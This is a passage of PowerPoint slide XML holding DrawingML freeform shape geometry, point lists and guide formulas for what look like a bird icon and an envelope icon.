                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1567" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="1049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1511" y="1049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1547" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1276" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1290" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297" y="536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297" y="536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1338" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1408" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1553" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1553" y="271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1553" y="271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1463" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1262" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1193" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1082" y="348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1082" y="348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1041" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="742" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="742" y="1049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985" y="1049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="1696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153" y="1661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="1571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="1515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="0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Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="699756" y="4465856"/>
            <a:ext cx="409399" cy="329047"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1851 w 1894"/>
              <a:gd name="T1" fmla="*/ 223 h 1426"/>
              <a:gd name="T2" fmla="*/ 1699 w 1894"/>
              <a:gd name="T3" fmla="*/ 355 h 1426"/>
              <a:gd name="T4" fmla="*/ 1699 w 1894"/>
              <a:gd name="T5" fmla="*/ 403 h 1426"/>
              <a:gd name="T6" fmla="*/ 1671 w 1894"/>
              <a:gd name="T7" fmla="*/ 619 h 1426"/>
              <a:gd name="T8" fmla="*/ 1629 w 1894"/>
              <a:gd name="T9" fmla="*/ 764 h 1426"/>
              <a:gd name="T10" fmla="*/ 1511 w 1894"/>
              <a:gd name="T11" fmla="*/ 966 h 1426"/>
              <a:gd name="T12" fmla="*/ 1414 w 1894"/>
              <a:gd name="T13" fmla="*/ 1091 h 1426"/>
              <a:gd name="T14" fmla="*/ 1289 w 1894"/>
              <a:gd name="T15" fmla="*/ 1202 h 1426"/>
              <a:gd name="T16" fmla="*/ 1067 w 1894"/>
              <a:gd name="T17" fmla="*/ 1334 h 1426"/>
              <a:gd name="T18" fmla="*/ 888 w 1894"/>
              <a:gd name="T19" fmla="*/ 1390 h 1426"/>
              <a:gd name="T20" fmla="*/ 596 w 1894"/>
              <a:gd name="T21" fmla="*/ 1425 h 1426"/>
              <a:gd name="T22" fmla="*/ 436 w 1894"/>
              <a:gd name="T23" fmla="*/ 1418 h 1426"/>
              <a:gd name="T24" fmla="*/ 208 w 1894"/>
              <a:gd name="T25" fmla="*/ 1363 h 1426"/>
              <a:gd name="T26" fmla="*/ 0 w 1894"/>
              <a:gd name="T27" fmla="*/ 1265 h 1426"/>
              <a:gd name="T28" fmla="*/ 90 w 1894"/>
              <a:gd name="T29" fmla="*/ 1272 h 1426"/>
              <a:gd name="T30" fmla="*/ 284 w 1894"/>
              <a:gd name="T31" fmla="*/ 1251 h 1426"/>
              <a:gd name="T32" fmla="*/ 465 w 1894"/>
              <a:gd name="T33" fmla="*/ 1181 h 1426"/>
              <a:gd name="T34" fmla="*/ 576 w 1894"/>
              <a:gd name="T35" fmla="*/ 1119 h 1426"/>
              <a:gd name="T36" fmla="*/ 395 w 1894"/>
              <a:gd name="T37" fmla="*/ 1077 h 1426"/>
              <a:gd name="T38" fmla="*/ 298 w 1894"/>
              <a:gd name="T39" fmla="*/ 1007 h 1426"/>
              <a:gd name="T40" fmla="*/ 208 w 1894"/>
              <a:gd name="T41" fmla="*/ 868 h 1426"/>
              <a:gd name="T42" fmla="*/ 284 w 1894"/>
              <a:gd name="T43" fmla="*/ 868 h 1426"/>
              <a:gd name="T44" fmla="*/ 389 w 1894"/>
              <a:gd name="T45" fmla="*/ 861 h 1426"/>
              <a:gd name="T46" fmla="*/ 208 w 1894"/>
              <a:gd name="T47" fmla="*/ 778 h 1426"/>
              <a:gd name="T48" fmla="*/ 124 w 1894"/>
              <a:gd name="T49" fmla="*/ 682 h 1426"/>
              <a:gd name="T50" fmla="*/ 77 w 1894"/>
              <a:gd name="T51" fmla="*/ 508 h 1426"/>
              <a:gd name="T52" fmla="*/ 117 w 1894"/>
              <a:gd name="T53" fmla="*/ 522 h 1426"/>
              <a:gd name="T54" fmla="*/ 249 w 1894"/>
              <a:gd name="T55" fmla="*/ 550 h 1426"/>
              <a:gd name="T56" fmla="*/ 180 w 1894"/>
              <a:gd name="T57" fmla="*/ 487 h 1426"/>
              <a:gd name="T58" fmla="*/ 124 w 1894"/>
              <a:gd name="T59" fmla="*/ 418 h 1426"/>
              <a:gd name="T60" fmla="*/ 77 w 1894"/>
              <a:gd name="T61" fmla="*/ 293 h 1426"/>
              <a:gd name="T62" fmla="*/ 77 w 1894"/>
              <a:gd name="T63" fmla="*/ 195 h 1426"/>
              <a:gd name="T64" fmla="*/ 132 w 1894"/>
              <a:gd name="T65" fmla="*/ 63 h 1426"/>
              <a:gd name="T66" fmla="*/ 291 w 1894"/>
              <a:gd name="T67" fmla="*/ 216 h 1426"/>
              <a:gd name="T68" fmla="*/ 485 w 1894"/>
              <a:gd name="T69" fmla="*/ 327 h 1426"/>
              <a:gd name="T70" fmla="*/ 811 w 1894"/>
              <a:gd name="T71" fmla="*/ 432 h 1426"/>
              <a:gd name="T72" fmla="*/ 922 w 1894"/>
              <a:gd name="T73" fmla="*/ 396 h 1426"/>
              <a:gd name="T74" fmla="*/ 929 w 1894"/>
              <a:gd name="T75" fmla="*/ 285 h 1426"/>
              <a:gd name="T76" fmla="*/ 1033 w 1894"/>
              <a:gd name="T77" fmla="*/ 105 h 1426"/>
              <a:gd name="T78" fmla="*/ 1158 w 1894"/>
              <a:gd name="T79" fmla="*/ 21 h 1426"/>
              <a:gd name="T80" fmla="*/ 1310 w 1894"/>
              <a:gd name="T81" fmla="*/ 0 h 1426"/>
              <a:gd name="T82" fmla="*/ 1532 w 1894"/>
              <a:gd name="T83" fmla="*/ 63 h 1426"/>
              <a:gd name="T84" fmla="*/ 1657 w 1894"/>
              <a:gd name="T85" fmla="*/ 98 h 1426"/>
              <a:gd name="T86" fmla="*/ 1837 w 1894"/>
              <a:gd name="T87" fmla="*/ 28 h 1426"/>
              <a:gd name="T88" fmla="*/ 1775 w 1894"/>
              <a:gd name="T89" fmla="*/ 139 h 1426"/>
              <a:gd name="T90" fmla="*/ 1671 w 1894"/>
              <a:gd name="T91" fmla="*/ 223 h 1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894" h="1426">
                <a:moveTo>
                  <a:pt x="1893" y="167"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1893" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1851" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1802" y="271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1754" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1699" y="355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1699" y="355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1699" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1699" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1699" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1684" y="550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1671" y="619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1650" y="689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1650" y="689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629" y="764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594" y="834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559" y="903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1511" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1511" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1463" y="1036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1414" y="1091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352" y="1154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="1202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="1202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1227" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1151" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="1334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="1369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="1369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888" y="1390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="797" y="1411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436" y="1418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353" y="1404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="1390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="1363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139" y="1334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="1307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409" y="1209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465" y="1181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="1154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="1077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333" y="868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389" y="861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389" y="861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319" y="841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264" y="813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201" y="542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291" y="216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589" y="376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="929" y="438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="929" y="438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="922" y="396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="922" y="362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="922" y="362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="929" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1033" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1033" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1158" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1387" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1463" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1532" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1657" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1719" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1775" y="139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726" y="188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1671" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1671" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1893" y="167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Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="699756" y="1925222"/>
            <a:ext cx="405982" cy="295992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2002 w 2003"/>
              <a:gd name="T1" fmla="*/ 161 h 1458"/>
              <a:gd name="T2" fmla="*/ 1989 w 2003"/>
              <a:gd name="T3" fmla="*/ 245 h 1458"/>
              <a:gd name="T4" fmla="*/ 1944 w 2003"/>
              <a:gd name="T5" fmla="*/ 322 h 1458"/>
              <a:gd name="T6" fmla="*/ 1919 w 2003"/>
              <a:gd name="T7" fmla="*/ 355 h 1458"/>
              <a:gd name="T8" fmla="*/ 1848 w 2003"/>
              <a:gd name="T9" fmla="*/ 419 h 1458"/>
              <a:gd name="T10" fmla="*/ 1809 w 2003"/>
              <a:gd name="T11" fmla="*/ 445 h 1458"/>
              <a:gd name="T12" fmla="*/ 1288 w 2003"/>
              <a:gd name="T13" fmla="*/ 786 h 1458"/>
              <a:gd name="T14" fmla="*/ 1242 w 2003"/>
              <a:gd name="T15" fmla="*/ 818 h 1458"/>
              <a:gd name="T16" fmla="*/ 1178 w 2003"/>
              <a:gd name="T17" fmla="*/ 857 h 1458"/>
              <a:gd name="T18" fmla="*/ 1120 w 2003"/>
              <a:gd name="T19" fmla="*/ 889 h 1458"/>
              <a:gd name="T20" fmla="*/ 1056 w 2003"/>
              <a:gd name="T21" fmla="*/ 915 h 1458"/>
              <a:gd name="T22" fmla="*/ 1004 w 2003"/>
              <a:gd name="T23" fmla="*/ 928 h 1458"/>
              <a:gd name="T24" fmla="*/ 998 w 2003"/>
              <a:gd name="T25" fmla="*/ 928 h 1458"/>
              <a:gd name="T26" fmla="*/ 972 w 2003"/>
              <a:gd name="T27" fmla="*/ 922 h 1458"/>
              <a:gd name="T28" fmla="*/ 947 w 2003"/>
              <a:gd name="T29" fmla="*/ 915 h 1458"/>
              <a:gd name="T30" fmla="*/ 882 w 2003"/>
              <a:gd name="T31" fmla="*/ 889 h 1458"/>
              <a:gd name="T32" fmla="*/ 824 w 2003"/>
              <a:gd name="T33" fmla="*/ 857 h 1458"/>
              <a:gd name="T34" fmla="*/ 760 w 2003"/>
              <a:gd name="T35" fmla="*/ 818 h 1458"/>
              <a:gd name="T36" fmla="*/ 715 w 2003"/>
              <a:gd name="T37" fmla="*/ 786 h 1458"/>
              <a:gd name="T38" fmla="*/ 418 w 2003"/>
              <a:gd name="T39" fmla="*/ 593 h 1458"/>
              <a:gd name="T40" fmla="*/ 194 w 2003"/>
              <a:gd name="T41" fmla="*/ 445 h 1458"/>
              <a:gd name="T42" fmla="*/ 65 w 2003"/>
              <a:gd name="T43" fmla="*/ 329 h 1458"/>
              <a:gd name="T44" fmla="*/ 32 w 2003"/>
              <a:gd name="T45" fmla="*/ 290 h 1458"/>
              <a:gd name="T46" fmla="*/ 7 w 2003"/>
              <a:gd name="T47" fmla="*/ 219 h 1458"/>
              <a:gd name="T48" fmla="*/ 0 w 2003"/>
              <a:gd name="T49" fmla="*/ 187 h 1458"/>
              <a:gd name="T50" fmla="*/ 14 w 2003"/>
              <a:gd name="T51" fmla="*/ 109 h 1458"/>
              <a:gd name="T52" fmla="*/ 46 w 2003"/>
              <a:gd name="T53" fmla="*/ 52 h 1458"/>
              <a:gd name="T54" fmla="*/ 71 w 2003"/>
              <a:gd name="T55" fmla="*/ 25 h 1458"/>
              <a:gd name="T56" fmla="*/ 135 w 2003"/>
              <a:gd name="T57" fmla="*/ 0 h 1458"/>
              <a:gd name="T58" fmla="*/ 1822 w 2003"/>
              <a:gd name="T59" fmla="*/ 0 h 1458"/>
              <a:gd name="T60" fmla="*/ 1860 w 2003"/>
              <a:gd name="T61" fmla="*/ 0 h 1458"/>
              <a:gd name="T62" fmla="*/ 1919 w 2003"/>
              <a:gd name="T63" fmla="*/ 25 h 1458"/>
              <a:gd name="T64" fmla="*/ 1951 w 2003"/>
              <a:gd name="T65" fmla="*/ 45 h 1458"/>
              <a:gd name="T66" fmla="*/ 1989 w 2003"/>
              <a:gd name="T67" fmla="*/ 103 h 1458"/>
              <a:gd name="T68" fmla="*/ 2002 w 2003"/>
              <a:gd name="T69" fmla="*/ 161 h 1458"/>
              <a:gd name="T70" fmla="*/ 2002 w 2003"/>
              <a:gd name="T71" fmla="*/ 1290 h 1458"/>
              <a:gd name="T72" fmla="*/ 1996 w 2003"/>
              <a:gd name="T73" fmla="*/ 1322 h 1458"/>
              <a:gd name="T74" fmla="*/ 1970 w 2003"/>
              <a:gd name="T75" fmla="*/ 1380 h 1458"/>
              <a:gd name="T76" fmla="*/ 1951 w 2003"/>
              <a:gd name="T77" fmla="*/ 1406 h 1458"/>
              <a:gd name="T78" fmla="*/ 1892 w 2003"/>
              <a:gd name="T79" fmla="*/ 1444 h 1458"/>
              <a:gd name="T80" fmla="*/ 1822 w 2003"/>
              <a:gd name="T81" fmla="*/ 1457 h 1458"/>
              <a:gd name="T82" fmla="*/ 181 w 2003"/>
              <a:gd name="T83" fmla="*/ 1457 h 1458"/>
              <a:gd name="T84" fmla="*/ 110 w 2003"/>
              <a:gd name="T85" fmla="*/ 1444 h 1458"/>
              <a:gd name="T86" fmla="*/ 51 w 2003"/>
              <a:gd name="T87" fmla="*/ 1406 h 1458"/>
              <a:gd name="T88" fmla="*/ 32 w 2003"/>
              <a:gd name="T89" fmla="*/ 1380 h 1458"/>
              <a:gd name="T90" fmla="*/ 7 w 2003"/>
              <a:gd name="T91" fmla="*/ 1322 h 1458"/>
              <a:gd name="T92" fmla="*/ 0 w 2003"/>
              <a:gd name="T93" fmla="*/ 471 h 1458"/>
              <a:gd name="T94" fmla="*/ 51 w 2003"/>
              <a:gd name="T95" fmla="*/ 516 h 1458"/>
              <a:gd name="T96" fmla="*/ 116 w 2003"/>
              <a:gd name="T97" fmla="*/ 561 h 1458"/>
              <a:gd name="T98" fmla="*/ 669 w 2003"/>
              <a:gd name="T99" fmla="*/ 915 h 1458"/>
              <a:gd name="T100" fmla="*/ 772 w 2003"/>
              <a:gd name="T101" fmla="*/ 986 h 1458"/>
              <a:gd name="T102" fmla="*/ 818 w 2003"/>
              <a:gd name="T103" fmla="*/ 1006 h 1458"/>
              <a:gd name="T104" fmla="*/ 876 w 2003"/>
              <a:gd name="T105" fmla="*/ 1031 h 1458"/>
              <a:gd name="T106" fmla="*/ 998 w 2003"/>
              <a:gd name="T107" fmla="*/ 1057 h 1458"/>
              <a:gd name="T108" fmla="*/ 1004 w 2003"/>
              <a:gd name="T109" fmla="*/ 1057 h 1458"/>
              <a:gd name="T110" fmla="*/ 1062 w 2003"/>
              <a:gd name="T111" fmla="*/ 1051 h 1458"/>
              <a:gd name="T112" fmla="*/ 1127 w 2003"/>
              <a:gd name="T113" fmla="*/ 1031 h 1458"/>
              <a:gd name="T114" fmla="*/ 1230 w 2003"/>
              <a:gd name="T115" fmla="*/ 986 h 1458"/>
              <a:gd name="T116" fmla="*/ 1333 w 2003"/>
              <a:gd name="T117" fmla="*/ 915 h 1458"/>
              <a:gd name="T118" fmla="*/ 1564 w 2003"/>
              <a:gd name="T119" fmla="*/ 760 h 1458"/>
              <a:gd name="T120" fmla="*/ 1887 w 2003"/>
              <a:gd name="T121" fmla="*/ 561 h 1458"/>
              <a:gd name="T122" fmla="*/ 2002 w 2003"/>
              <a:gd name="T123" fmla="*/ 471 h 14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003" h="1458">
                <a:moveTo>
                  <a:pt x="2002" y="161"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2002" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1996" y="206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944" y="322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944" y="322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1887" y="387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1848" y="419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809" y="445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809" y="445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288" y="786"/>
                </a:lnTo>
